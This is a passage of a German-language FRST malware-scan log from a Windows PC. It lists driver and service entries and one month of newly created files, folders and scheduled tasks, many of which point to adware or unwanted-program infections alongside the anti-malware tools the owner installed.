R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [102912 2015-05-28] (Advanced Micro Devices)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2016-07-16] (Realtek                                            )
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2016-10-09] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 USBNUMP; C:\WINDOWS\System32\drivers\USBNUMP.sys [13872 2009-08-14] (Windows (R) Codename Longhorn DDK provider)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S1 850f7be33916569bd078ba09b46b7e7d; \??\C:\WINDOWS\system32\drivers\850f7be33916569bd078ba09b46b7e7d.sys [X]
S1 bsdpr64; \??\C:\WINDOWS\system32\Drivers\bsdpr64.sys [X]
S1 NetUtils2016; \??\C:\WINDOWS\system32\drivers\NetUtils2016.sys [X] <==== ACHTUNG

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-10-18 14:08 - 2016-10-18 14:08 - 00000000 ____D C:\Users\maikp\Downloads\FRST-OlderVersion
2016-10-18 13:06 - 2016-10-18 13:06 - 00000000 ____D C:\Users\maikp\AppData\Local\03AA02FC-1476796004-05C3-7606-B70700080009
2016-10-18 12:59 - 2016-10-18 12:59 - 46039467 _____ C:\xpack1018_DE.1476784947.exe
2016-10-18 12:42 - 2016-10-18 12:42 - 00000000 ___HD C:\OneDriveTemp
2016-10-18 12:41 - 2016-10-18 12:41 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00FEDC30
2016-10-18 12:41 - 2016-10-18 12:41 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00FCF600
2016-10-18 12:41 - 2016-10-18 12:41 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000015775DEA1A8
2016-10-18 12:41 - 2016-10-18 12:41 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000015775DD1D98
2016-10-18 12:02 - 2016-10-18 12:02 - 00046592 _____ C:\exervice.exe
2016-10-18 11:55 - 2016-10-18 11:55 - 46039469 _____ C:\xpack1017_DE.1476710064.exe
2016-10-17 20:00 - 2016-10-17 20:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0081AF20
2016-10-17 19:59 - 2016-10-17 19:59 - 00000000 ____D C:\Users\maikp\AppData\LocalLow007FB810
2016-10-17 19:46 - 2016-10-17 19:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow011C4C80
2016-10-17 19:46 - 2016-10-17 19:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow011B1E08
2016-10-17 19:46 - 2016-10-17 19:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000002027086C3C8
2016-10-17 19:46 - 2016-10-17 19:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000020270844988
2016-10-17 19:00 - 2016-10-17 19:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow01585888
2016-10-17 19:00 - 2016-10-17 19:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow01562150
2016-10-17 19:00 - 2016-10-17 19:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000001FFCB67DB58
2016-10-17 19:00 - 2016-10-17 19:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000001FFCB655EF8
2016-10-17 18:11 - 2016-10-17 19:00 - 00000314 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-10-17 18:11 - 2016-10-17 19:00 - 00000314 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-10-17 18:11 - 2016-10-17 18:11 - 00024480 _____ C:\WINDOWS\System32\Tasks\{7F097A47-0A04-7A0C-7911-047E0C041104}
2016-10-17 18:11 - 2016-10-17 18:11 - 00003688 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-10-17 18:11 - 2016-10-17 18:11 - 00002960 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-10-17 18:11 - 2016-10-17 18:11 - 00002666 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-10-17 18:10 - 2016-10-17 18:11 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2016-10-17 18:10 - 2016-10-17 18:10 - 00001059 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
2016-10-17 18:10 - 2016-10-17 18:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2016-10-17 18:10 - 2016-10-17 18:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Social2S Browser Enhancer
2016-10-17 18:09 - 2016-10-17 18:10 - 00000000 ____D C:\Program Files\bf7821d4713d4971d25a53d8d6cb8f99
2016-10-17 17:15 - 2016-10-17 17:15 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00844778
2016-10-17 17:15 - 2016-10-17 17:15 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0082FFA0
2016-10-17 17:15 - 2016-10-17 17:15 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000029C378F6228
2016-10-17 17:15 - 2016-10-17 17:15 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000029C378D7D48
2016-10-17 16:40 - 2016-10-17 16:40 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0140FFD8
2016-10-17 16:40 - 2016-10-17 16:40 - 00000000 ____D C:\Users\maikp\AppData\LocalLow013FE4D0
2016-10-17 16:40 - 2016-10-17 16:40 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000002763D3227C8
2016-10-17 16:40 - 2016-10-17 16:40 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000002763D2F3018
2016-10-17 16:29 - 2016-10-17 16:29 - 00000000 ____D C:\Users\maikp\AppData\LocalLow013B0D18
2016-10-17 16:29 - 2016-10-17 16:29 - 00000000 ____D C:\Users\maikp\AppData\LocalLow013B05A8
2016-10-17 16:29 - 2016-10-17 16:29 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00000166888D70D8
2016-10-17 16:29 - 2016-10-17 16:29 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00000166888C34D8
2016-10-17 16:03 - 2016-10-17 16:03 - 01866930 _____ C:\WINDOWS\6819e3abef567df1f1330af4ff9ec057.exe
2016-10-17 15:49 - 2016-10-18 13:21 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-10-17 15:49 - 2016-10-18 12:43 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-10-17 15:49 - 2016-10-17 15:49 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-10-17 15:48 - 2016-10-18 12:42 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-10-17 15:46 - 2016-10-18 13:21 - 00000000 ____D C:\Users\maikp\Desktop\mbar
2016-10-17 15:46 - 2016-10-17 15:45 - 16563352 _____ (Malwarebytes Corp.) C:\Users\maikp\Desktop\mbar-1.09.3.1001.exe
2016-10-17 15:41 - 2016-10-17 15:45 - 16563352 _____ (Malwarebytes Corp.) C:\Users\maikp\Downloads\mbar-1.09.3.1001.exe
2016-10-17 15:21 - 2016-10-17 15:21 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00F58728
2016-10-17 15:21 - 2016-10-17 15:21 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000014D2CFA8778
2016-10-17 14:14 - 2016-10-17 16:27 - 00000000 ____D C:\Program Files (x86)\win_en_77
2016-10-17 14:14 - 2016-10-17 14:14 - 00000000 ____D C:\Users\maikp\AppData\Local\win_en_77
2016-10-17 14:01 - 2016-10-17 14:01 - 00003540 _____ C:\WINDOWS\System32\Tasks\ChelfNotify Task
2016-10-17 14:01 - 2016-10-17 14:01 - 00000000 ____D C:\ProgramData\ChelfNotify
2016-10-17 14:00 - 2016-10-17 14:01 - 00000000 ____D C:\Program Files (x86)\5sr6tz01
2016-10-17 13:43 - 2016-10-17 13:43 - 00003552 _____ C:\WINDOWS\System32\Tasks\GEN_Interval
2016-10-17 13:43 - 2016-10-17 13:43 - 00003208 _____ C:\WINDOWS\System32\Tasks\GEN
2016-10-17 13:43 - 2016-10-17 13:43 - 00000000 ____D C:\Program Files (x86)\FunFeedr
2016-10-17 13:30 - 2016-10-17 13:31 - 00033201 _____ C:\Users\maikp\Downloads\Addition.txt
2016-10-17 13:26 - 2016-10-18 14:08 - 00018316 _____ C:\Users\maikp\Downloads\FRST.txt
2016-10-17 13:26 - 2016-10-18 14:08 - 00000000 ____D C:\FRST
2016-10-17 13:25 - 2016-10-18 14:08 - 02407424 _____ (Farbar) C:\Users\maikp\Downloads\FRST64.exe
2016-10-17 13:13 - 2016-10-17 13:13 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0125E1E8
2016-10-17 13:13 - 2016-10-17 13:13 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000025484F3DA18
2016-10-15 14:59 - 2016-10-15 14:59 - 00000000 ___HD C:\$SysReset
2016-10-15 14:53 - 2016-10-15 14:53 - 00001292 _____ C:\Users\Public\Desktop\Avira Connect.lnk
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\ProgramData\Package Cache
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\ProgramData\Avira
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\Program Files (x86)\Avira
2016-10-15 14:52 - 2016-10-15 14:52 - 04480896 _____ (Avira Operations GmbH & Co. KG) C:\Users\maikp\Downloads\avira_de_av_580225382c90f__ws.exe
2016-10-14 20:33 - 2016-10-14 20:33 - 00000000 ____D C:\$WINDOWS.~BT
2016-10-14 19:47 - 2016-10-14 19:47 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00E46BC8
2016-10-14 19:47 - 2016-10-14 19:47 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000016C33528488
2016-10-14 17:54 - 2016-10-17 14:01 - 00000000 ____D C:\Program Files (x86)\InterHop
2016-10-14 17:53 - 2016-10-14 17:54 - 00000000 ____D C:\Program Files (x86)\rpi9tiy4
2016-10-12 15:46 - 2016-10-12 15:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0098AB70
2016-10-12 15:46 - 2016-10-12 15:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000001F63CD29028
2016-10-09 13:06 - 2016-10-09 13:06 - 00436224 _____ (GmbH) C:\WINDOWS\system32\bi3.exe
2016-10-09 08:02 - 2016-10-09 08:02 - 00000000 ____D C:\WINDOWS\system32\owew
2016-10-09 08:00 - 2016-10-09 08:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow033F8D50
2016-10-09 08:00 - 2016-10-09 08:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000010ED7324178
2016-10-09 07:59 - 2016-10-17 16:27 - 00000000 ____D C:\Program Files\Yhid
2016-10-09 07:59 - 2016-10-09 07:59 - 00008948 _____ C:\WINDOWS\System32\Tasks\Anezotionprodily Verfier
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Geunfy
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\LocalLow\Company
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\Local\Tempfolder
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\uninst
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\ProgramData\0781609d-5e85-1
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\ProgramData\0781609d-1fb5-0
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Program Files\YhidUn
2016-10-09 07:58 - 2016-10-17 14:01 - 00000000 ____D C:\Program Files (x86)\Memucoojick
2016-10-09 07:58 - 2016-10-09 07:58 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Herzaentreernos
2016-10-09 07:58 - 2016-10-09 07:58 - 00000000 ____D C:\Users\maikp\AppData\Local\Cleqiryvovaght
2016-10-09 07:53 - 2016-10-18 13:46 - 00000855 _____ C:\WINDOWS\SysWOW64\data
2016-10-09 07:48 - 2016-10-18 12:42 - 00000000 ____D C:\Users\maikp\AppData\Local\DailyBee
2016-10-09 07:48 - 2016-10-12 15:46 - 00440832 _____ C:\ProgramData\smp2.exe
2016-10-09 07:48 - 2016-10-09 07:48 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-10-09 07:48 - 2016-10-09 07:48 - 00004422 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_333836353438353032372d4a5b5b345a417845455a376c
2016-10-09 07:48 - 2016-10-09 07:48 - 00004262 _____ C:\WINDOWS\System32\Tasks\SMW_P
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DailyBee
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\Users\maikp\AppData\Roaming\DailyBee
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\ProgramData\SearchModule
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2016-10-09 07:43 - 2016-10-09 07:43 - 00000000 ____D C:\ProgramData\Microleaves
2016-10-09 07:43 - 2016-10-09 07:43 - 00000000 _____ C:\WINDOWS\system32\㌠瀴Ť__00007FF6FAFCA32A__C0000005.dmp
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Users\maikp\AppData\Roaming\WikiZ
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WikiZ
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Users\maikp\AppData\Local\Phatek
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Program Files (x86)\Priuhgily
2016-10-08 21:00 - 2016-10-17 16:27 - 00000000 ____D C:\Program Files (x86)\DPower
2016-10-08 21:00 - 2016-10-08 21:01 - 00000000 ____D C:\Users\Public\Thunder Network
2016-10-08 21:00 - 2016-10-08 21:00 - 00008996 _____ C:\WINDOWS\System32\Tasks\Jizergh Launcher
2016-10-08 21:00 - 2016-10-08 21:00 - 00000000 ____T C:\WINDOWS\system32\mfs379.tmp
2016-10-08 21:00 - 2016-10-08 21:00 - 00000000 ____D C:\Users\maikp\AppData\Local\tuto_monetize_120161008
2016-10-08 21:00 - 2016-10-08 21:00 - 00000000 ____D C:\ProgramData\Thunder Network
2016-10-08 20:59 - 2016-10-17 15:21 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2016-10-08 20:59 - 2016-10-08 20:59 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\WINDOWS\SysWOW64\sstmp
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\WINDOWS\System32\Tasks\Y2Go
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\WINDOWS\system32\sstmp
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpaceSoundPro 1.0
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Users\maikp\AppData\Roaming\HDWallPaper
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files\Caster
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files (x86)\Y2GoUpdater
2016-10-08 20:58 - 2016-10-18 12:57 - 00000000 ____D C:\Users\maikp\AppData\Local\Apps\2.0
2016-10-08 20:58 - 2016-10-17 16:27 - 00000000 ____D C:\Program Files\SpaceSoundPro
2016-10-08 20:58 - 2016-10-17 16:27 - 00000000 ____D C:\Program Files (x86)\mpck
2016-10-08 20:58 - 2016-10-14 18:04 - 00000000 ____D C:\Program Files (x86)\OtherSearch
2016-10-08 20:58 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files (x86)\Y2Go
2016-10-08 20:58 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files (x86)\Ferqesp
2016-10-08 20:58 - 2016-10-08 20:58 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Clumick
2016-10-08 20:58 - 2016-10-08 20:58 - 00000000 ____D C:\Users\maikp\AppData\Local\Ulighthazertion
2016-10-08 20:58 - 2016-10-08 20:58 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
2016-10-08 20:57 - 2016-10-08 20:57 - 00004164 _____ C:\WINDOWS\System32\Tasks\WebDiscover Browser Update Task
2016-10-08 20:57 - 2016-10-08 20:57 - 00003394 _____ C:\WINDOWS\System32\Tasks\WebDiscover Browser Launch Task
2016-10-08 20:57 - 2016-10-08 20:57 - 00000000 ____D C:\Users\maikp\AppData\Local\WebDiscoverBrowser
2016-10-08 20:57 - 2016-10-08 20:57 - 00000000 ____D C:\Program Files\WebDiscoverBrowser
2016-10-08 20:55 - 2016-10-18 11:41 - 00000000 ____D C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009
2016-10-08 20:55 - 2016-10-14 18:54 - 00000000 ____D C:\Program Files (x86)\WebShield
2016-10-08 20:55 - 2016-10-08 20:55 - 00003766 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Updater
2016-10-08 20:55 - 2016-10-08 20:55 - 00003708 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guardian
2016-10-08 20:55 - 2016-10-08 20:55 - 00003702 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guard
2016-10-08 20:55 - 2016-10-08 20:55 - 00003690 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 ____D C:\Users\maikp\AppData\Roaming\YSPackage
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YSPackage
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 ____D C:\Program Files (x86)\Microleaves
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 _____ C:\TOSTACK
2016-10-08 20:54 - 2016-10-18 12:42 - 00000000 ____D C:\Users\maikp\AppData\Local\AppTrailers
2016-10-08 20:53 - 2016-10-08 20:56 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microleaves
2016-10-08 20:53 - 2016-10-08 20:53 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppTrailers
2016-10-08 20:53 - 2016-10-08 20:53 - 00000000 ____D C:\Users\maikp\AppData\Roaming\AppTrailers
2016-10-08 20:52 - 2016-10-18 12:36 - 00000000 ____D C:\ProgramData\Quoteex
2016-10-08 20:52 - 2016-10-17 13:14 - 00002378 _____ C:\WINDOWS\SysWOW64\findit.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 07176704 _____ C:\Users\maikp\AppData\Roaming\agent.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 01928315 _____ C:\Users\maikp\AppData\Roaming\KeyApphase.tst
2016-10-08 20:52 - 2016-10-08 20:52 - 01897576 _____ C:\Users\maikp\AppData\Roaming\Sao-Cof.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 00190394 _____ C:\Users\maikp\AppData\Roaming\Doublephase.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 00140288 _____ C:\Users\maikp\AppData\Roaming\Installer.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 00126464 _____ C:\Users\maikp\AppData\Roaming\noah.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 00070704 _____ C:\Users\maikp\AppData\Roaming\Config.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 00018432 _____ C:\Users\maikp\AppData\Roaming\Main.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 00015792 _____ C:\Users\maikp\AppData\Roaming\InstallationConfiguration.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 00005568 _____ C:\Users\maikp\AppData\Roaming\md.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\Quoteexs
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\NetworkPacketManitor
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Social2Se Browser Enhancer
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\Logic Handler
2016-10-08 20:51 - 2016-10-17 18:09 - 00000000 ____D C:\WINDOWS\system32\SSL
2016-10-08 20:51 - 2016-10-09 07:43 - 00000000 ____D C:\Program Files\ad11222373fdc03dd874a65a6c6001bc
2016-10-07 16:44 - 2016-10-07 16:44 - 00000000 ___RD C:\Users\maikp\Downloads\BallardAppCraftery.CraftyFileViewer_epyrqhfctk40t!App
2016-10-06 19:57 - 2016-10-14 20:10 - 00000000 ____D C:\Users\maikp\Desktop\Nintendo 3DS
2016-10-06 19:54 - 2016-10-06 19:54 - 00115504 _____ C:\Users\maikp\OneDrive\Documents\encTitleKeys.bin
2016-10-06 19:53 - 2016-10-06 19:53 - 03699648 _____ C:\Users\maikp\OneDrive\Documents\freeShop-2.1.1.cia
2016-10-06 19:53 - 2016-10-06 19:53 - 03056576 _____ C:\Users\maikp\OneDrive\Documents\freeShop-1.2.2.cia
2016-10-06 19:52 - 2016-10-06 19:52 - 03220416 _____ C:\Users\maikp\Downloads\freeShop-2.1.3.cia
2016-10-05 16:36 - 2016-10-05 16:40 - 00000951 _____ C:\WINDOWS\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0}.job
2016-10-05 16:36 - 2016-10-05 16:36 - 00004148 _____ C:\WINDOWS\System32\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0}
2016-10-05 16:36 - 2016-10-05 16:36 - 00001014 _____ C:\Users\Public\Desktop\EPSON Scan.lnk
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EPSON Software
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EPSON
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\Program Files\Common Files\EPSON
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\Program Files (x86)\EPSON Software
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\Program Files (x86)\epson
2016-10-05 16:36 - 2014-06-03 00:00 - 00472064 _____ (Seiko Epson Corporation) C:\WINDOWS\system32\esxw2ud.dll
2016-10-05 16:36 - 2012-05-17 00:00 - 00144560 _____ (Seiko Epson Corporation) C:\WINDOWS\system32\escsvc64.exe
2016-10-05 16:34 - 2014-03-04 21:06 - 00180224 _____ (SEIKO EPSON CORPORATION) C:\WINDOWS\system32\E_YLMBPME.DLL
2016-10-05 16:34 - 2011-03-14 20:03 - 00083968 _____ (SEIKO EPSON CORPORATION) C:\WINDOWS\system32\E_YD4BPME.DLL
2016-10-05 16:33 - 2016-10-05 16:36 - 00000000 ____D C:\ProgramData\Epson
2016-10-05 16:30 - 2016-10-05 16:30 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-10-03 12:02 - 2016-10-14 17:57 - 00000000 ____D C:\Users\maikp\AppData\Local\MEGAsync
2016-10-03 12:02 - 2016-10-03 12:02 - 00000000 ____D C:\Users\maikp\AppData\Local\Mega Limited
2016-10-03 11:56 - 2016-10-03 12:01 - 12903336 _____ (MEGA Limited) C:\Users\maikp\Downloads\MEGAsyncSetup(1).exe
2016-10-03 11:52 - 2016-10-03 12:02 - 12903336 _____ (MEGA Limited) C:\Users\maikp\Downloads\MEGAsyncSetup.exe
2016-10-03 11:40 - 2016-10-18 12:46 - 00001431 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-10-03 11:40 - 2016-10-18 12:46 - 00001419 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-10-03 11:40 - 2016-10-03 11:48 - 00000000 ____D C:\Users\maikp\AppData\Local\Mozilla
2016-10-03 11:40 - 2016-10-03 11:41 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Mozilla
2016-10-03 11:40 - 2016-10-03 11:40 - 00243744 _____ C:\Users\maikp\Downloads\Firefox Setup Stub 49.0.1.exe
2016-10-03 11:40 - 2016-10-03 11:40 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-10-02 20:49 - 2016-10-03 12:01 - 00000000 ___RD C:\Users\maikp\OneDrive\Documents\Scanned Documents
2016-10-02 20:49 - 2016-10-02 20:49 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Fax
2016-10-02 18:39 - 2016-10-02 18:40 - 375232764 _____ (Adobe Systems Inc. ) C:\Users\maikp\Downloads\PS_CS2_Gr_NonRet.exe
2016-10-02 18:18 - 2016-10-02 18:18 - 30680056 _____ (InstaTime) C:\Users\maikp\Downloads\InstaTime.9.3.10rhinst (1).exe
2016-10-02 18:12 - 2016-10-02 18:12 - 30680056 _____ (InstaTime) C:\Users\maikp\Downloads\InstaTime.9.3.10rhinst.exe
2016-09-30 06:32 - 2016-09-15 19:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2016-09-30 06:32 - 2016-09-15 19:35 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2016-09-30 06:32 - 2016-09-15 19:34 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-09-30 06:32 - 2016-09-15 19:33 - 00083120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devenum.dll
2016-09-30 06:32 - 2016-09-15 19:29 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2016-09-30 06:32 - 2016-09-15 19:28 - 07812960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-09-30 06:32 - 2016-09-15 19:27 - 00434528 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2016-09-30 06:32 - 2016-09-15 19:23 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-09-30 06:32 - 2016-09-15 19:22 - 00860512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-09-30 06:32 - 2016-09-15 19:22 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2016-09-30 06:32 - 2016-09-15 19:21 - 01980776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-09-30 06:32 - 2016-09-15 19:21 - 01000288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-09-30 06:32 - 2016-09-15 19:20 - 00634944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2016-09-30 06:32 - 2016-09-15 19:15 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-09-30 06:32 - 2016-09-15 19:14 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-09-30 06:32 - 2016-09-15 19:14 - 00119648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2016-09-30 06:32 - 2016-09-15 19:13 - 00113504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2016-09-30 06:32 - 2016-09-15 19:12 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-09-30 06:32 - 2016-09-15 19:06 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2016-09-30 06:32 - 2016-09-15 19:06 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2016-09-30 06:32 - 2016-09-15 19:03 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TempSignedLicenseExchangeTask.dll
